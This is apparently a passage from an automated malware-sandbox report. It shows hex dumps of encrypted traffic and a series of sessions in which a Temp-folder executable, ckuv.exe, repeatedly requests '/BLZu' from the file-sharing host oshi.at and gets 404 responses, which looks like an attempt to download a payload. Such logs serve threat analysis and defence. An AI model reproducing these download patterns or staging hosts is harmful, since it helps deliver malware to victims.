                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: 90 99 1f af f9 6e 0f 0f 21 d5 91 09 e5 7f 03 80 a2 49 30 1a 14 2a 66 21 87 ca 61 8d 48 36 e3 4c 56 46 88 4b c1 50 20 a5 84 3b 58 60 01 78 ed 7d f7 fa aa 69 19 97 9f d9 df 02 09 53 da a4 de 9b b1 50 aa 84 f4 f5 df 06 68 b7 09 d9 a0 0f 1e 29 8e 87 d1 a6 17 59 50 49 99 76 09 fb 26 25 90 73 e9 67 45 d5 67 17 d7 df 09 77 30 c3 d8 bc 99 e1 76 5b 6f 29 31 97 98 59 b5 59 33 80 e5 0e 46 ee a2 c5 c4 95 df 55 f9 36 e2 32 34 b3 44 2e 49 21 0c e3 d2 55 4b 16 96 66 13 14 17 0d 23 12 78 e6 61 dd 95 a1 b8 44 4d 3e 1b 35 e5 cf 25 80 f2 b0 be 8c 68 c8 bd a4 14 d7 69 0d 90 19 87 93 44 d8 f3 ee d8 c8 fa 62 34 86 a4 20 ba e6 83 5f 96 93 0a 35 79 3d 2f c1 e9 99 c3 c6 94 fd 57 72 2e 44 dc ad 3f f6 c7 a1 37 1c 51 33 10 4b 2e 6b 38 5e b1 6c aa 06 2f 02 59 8b b4 77 f7 04 70 33 84
                                                                                                        Data Ascii: n!I0*f!aH6LVFKP ;X`x}iSPh)YPIv&%sgEgw0v[o)1YY3FU624D.I!UKf#xaDM>5%hiDb4 _5y=/Wr.D?7Q3K.k8^l/Ywp3
                                                                                                        2025-01-13 02:01:39 UTC931INData Raw: 3a 40 b9 9a 85 7c 2c 81 ed b0 c4 03 71 51 56 5e fd 3c d9 7c 0c 69 9e f5 55 7a 18 ed 6c 27 b2 5d d2 b0 0e 2c a4 fc 38 54 63 7c 6e 73 df 12 6d 55 d7 dd a6 61 44 20 60 cb a2 74 e0 b0 8f a7 5d 38 48 cc 18 1b 20 d5 9f 63 83 73 56 29 35 bb 98 60 9f de 20 d3 9c d7 3f e8 60 14 9d 5d 89 e9 c8 fa ad 10 9f 95 cc d5 da 4c b2 65 2c 63 d6 be 26 a2 69 40 9a eb 60 01 0f c9 30 bb 13 a8 61 8b ab a8 7f a2 5b 4a 3c 35 33 92 b2 af 9f d9 20 f9 c4 8b de 1f 0e 32 03 97 67 62 c0 59 d4 b8 df 7e 01 8e 7d 06 56 f2 40 e9 58 94 be 62 a3 c3 e1 5a c9 46 68 13 b1 58 c2 f1 3d 86 d5 08 09 10 3a 21 69 4b 3c 7f a9 07 e8 5a d0 72 15 eb 71 ef 4f 71 86 5e ac a3 c0 e6 fb b7 6c 06 d4 39 e1 6f d4 44 b9 b2 cf 94 56 c7 58 5b 32 2c a7 9f 82 39 38 fd 08 87 7a 1d 10 d1 6f e1 8b 64 63 ca e7 96 69 e7 bb
                                                                                                        Data Ascii: :@|,qQV^<|iUzl'],8Tc|nsmUaD `t]8H csV)5` ?`]Le,c&i@`0a[J<53 2gbY~}V@XbZFhX=:!iK<ZrqOq^l9oDVX[2,98zodci
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: 37 8b 80 0d eb c2 22 a2 d6 f8 4e fa 07 11 53 57 74 a2 b6 a2 f9 b3 00 cd 9e d8 d0 ee 53 3f ec 31 24 ba cd 6d 3d e8 5f 19 76 fa 02 f7 67 ce 00 ae 5b ef ed 8b ce 6d 4f fa 16 f3 cb b8 c4 91 f3 59 d4 89 74 df 01 2b b3 88 32 21 2d d8 13 26 47 76 45 f0 01 40 9f 4d d6 36 28 dd 64 5f b1 e6 7f c1 13 f6 f6 5d e0 e2 b8 fd 35 54 5e 30 03 4e e8 af 40 44 34 9c 43 44 e1 c2 9b 0d 91 b5 9b 93 f1 37 e8 cf 49 93 18 6d 21 d7 d1 98 0c 9c 92 16 a3 30 4e 70 24 7c 68 c7 ed e0 9e 6d b3 e2 98 bc c0 58 58 9b 1f 22 15 fd 78 0c 63 01 3f 4f 52 34 7f e2 a2 b1 4c 06 9a 7d ba f3 87 3d 6e 55 ab a1 a2 3c 05 cf 19 0e da 42 34 db 23 65 7d dd ba 22 dc 99 84 b0 c9 55 41 52 c7 d2 ad dd 34 00 d9 4a de 09 08 11 1c 77 04 b0 bd 56 3a 2c b0 17 30 99 bb e7 d2 92 4b 41 be d6 e6 a2 cc 90 8a 31 cb 9c f7
                                                                                                        Data Ascii: 7"NSWtS?1$m=_vg[mOYt+2!-&GvE@M6(d_]5T^0N@D4CD7Im!0Np$|hmXX"xc?OR4L}=nU<B4#e}"UAR4JwV:,0KA1
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: c4 79 82 a3 e4 e9 a4 ef 8f 03 7d 91 a2 a6 eb b5 89 43 98 2f e3 c6 78 25 d3 46 c1 a1 f5 0c e8 59 37 bd 4e 83 72 b8 0c 1d 3d 51 f7 33 7d 32 40 99 50 da 8a b2 9b 4a ec 16 09 89 34 52 aa df cc ec 39 33 9f 44 ee 6d 8c ed 15 c1 77 d4 66 88 ae b5 5c 0d 2e f3 05 4e c6 a5 aa d5 79 c4 d4 c8 33 dd 87 a4 05 86 42 3d d8 a2 62 79 f0 03 d4 fe 63 ee 18 0e 95 ef 31 a8 1d d5 f2 17 87 8f 6e 61 7f eb 25 0f dd ee 45 bb 13 b5 b5 0d fb 4b ee 8c 9f ce b8 0d 2c 36 b5 a0 43 ab 73 3f 2b 71 a3 64 5f c0 e2 e2 f1 93 33 fa 87 91 1a 25 9a 68 ee 54 35 9f ac 19 e0 af e4 e3 8e d3 8c b5 c3 14 70 ae 5d f4 1c 55 bc 22 45 37 3b 94 22 f2 d9 97 2d 28 29 85 50 2f e5 19 94 b5 3a b1 96 22 a5 a9 e0 05 ea f8 d8 7e 89 83 b7 c0 81 cd 56 0f e0 42 39 b0 0c c6 b2 a4 5f 09 7f 86 99 07 82 bc 55 58 1b 9b 06
                                                                                                        Data Ascii: y}C/x%FY7Nr=Q3}2@PJ4R93Dmwf\.Ny3B=byc1na%EK,6Cs?+qd_3%hT5p]U"E7;"-()P/:"~VB9_UX
                                                                                                        2025-01-13 02:01:39 UTC4096INData Raw: 36 9a e4 34 eb f9 57 81 bd e7 82 a9 17 7c fa 52 eb 6a 06 54 55 4e be 08 25 7d f1 cb cb 35 cd 18 a2 7a 58 6d 89 dd dd 4f b7 cd af 12 cc 7d 08 51 12 a2 e4 0b b9 53 8f fb 72 e5 bb 7e 5a 54 0a 5d 35 53 36 d1 2e 64 85 43 72 2b f6 2c c1 59 6a 62 bf 80 dd 7c b9 d3 9d 9b 5c d0 9c 4a f9 d2 89 7a 06 92 ae 77 3f 35 97 9c dd 7c 73 63 1a 2f e8 54 d1 db 2d d1 25 72 6b ad 83 49 b4 e4 2e b7 bf 22 88 ab fd f4 07 d6 ba 62 41 fd 9c ce a9 34 cf b3 66 44 82 96 27 38 09 f8 75 ec c4 7b 79 4e 18 92 96 09 be af c5 44 fe ae 17 0b f9 22 27 a7 f7 72 8d dc 30 90 47 e0 a1 b4 d2 4a b2 1e eb ae 84 07 26 5c 30 0d 97 93 9e 6c bc e3 2a ec 89 91 78 91 ed 82 7c ad 19 65 f4 e1 79 e2 e9 94 9a 40 ea 58 b5 53 e9 1a 23 82 75 da 95 f8 13 a7 78 7a ba 44 93 19 00 db 49 cb ad 7c de de d7 4e 52 d7 a5
                                                                                                        Data Ascii: 64W|RjTUN%}5zXmO}QSr~ZT]5S6.dCr+,Yjb|\Jzw?5|sc/T-%rkI."bA4fD'8u{yND"'r0GJ&\0l*x|ey@XS#uxzDI|NR
                                                                                                        2025-01-13 02:01:39 UTC1082INData Raw: 6e 61 86 24 06 06 69 92 1e da 6c 5b f1 e4 bd 0c c5 d1 86 24 a2 5f 4e dd 77 77 33 86 cf 6d 3e 07 ac 3a 55 98 3d 36 a3 df 21 54 d3 a7 e2 92 5c a0 bf 62 c8 e8 05 d5 be 5a 76 82 0f 1f cc 55 1d 3b bb cf 17 9e 40 ce 4e b7 0e 3a 13 58 59 e6 38 60 c7 cc cd bd 6a 22 a1 5b 21 3f 4f 33 fa cf 90 f3 f2 e2 0b 16 d8 0a 66 90 0b f7 8c f6 9f 4a 44 fc 2b c5 b4 8f 69 ee 6a 96 45 72 f7 02 20 c5 0a a9 35 16 12 3f 5e 3e ce 54 7a d9 0b 16 c9 b3 e0 b1 a3 ac 2b 4a ec da 20 11 53 b4 b8 67 58 61 be 99 5c 51 14 3c e1 66 5e 7c 2b 59 b6 39 39 27 1d 0a 06 ac dc 3e f3 76 f9 72 07 fe 12 a8 e1 88 4c c0 72 04 37 ef 65 d9 1a 0f b6 3e 54 34 46 d8 c0 9a ba 4c c2 ae 67 df d0 a1 b2 be db c7 62 9d 04 a1 fb 0e 3c c1 ca 0f f2 22 35 c7 e6 94 bb 9d e5 b8 a3 04 90 5e 9f a2 8c 3e 33 50 7b 0c 17 f9 1f
                                                                                                        Data Ascii: na$il[$_Nww3m>:U=6!T\bZvU;@N:XY8`j"[!?O3fJD+ijEr 5?^>Tz+J SgXa\Q<f^|+Y99'>vrLr7e>T4FLgb<"5^>3P{


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        10192.168.2.449749194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:41 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:41 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:41 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:41 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        11192.168.2.449750194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:42 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:43 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:43 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:43 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        12192.168.2.449751194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:44 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:45 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:45 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:45 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        13192.168.2.449752194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:46 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:46 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:46 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:46 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        14192.168.2.449753194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:48 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:49 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:49 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:49 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        15192.168.2.449754194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:50 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:50 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:50 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:50 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        16192.168.2.449755194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:51 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:53 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:53 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:53 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        17192.168.2.449756194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:54 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:55 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:55 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:55 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        18192.168.2.449758194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:01:57 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:01:58 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:01:58 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:01:58 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.449760194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
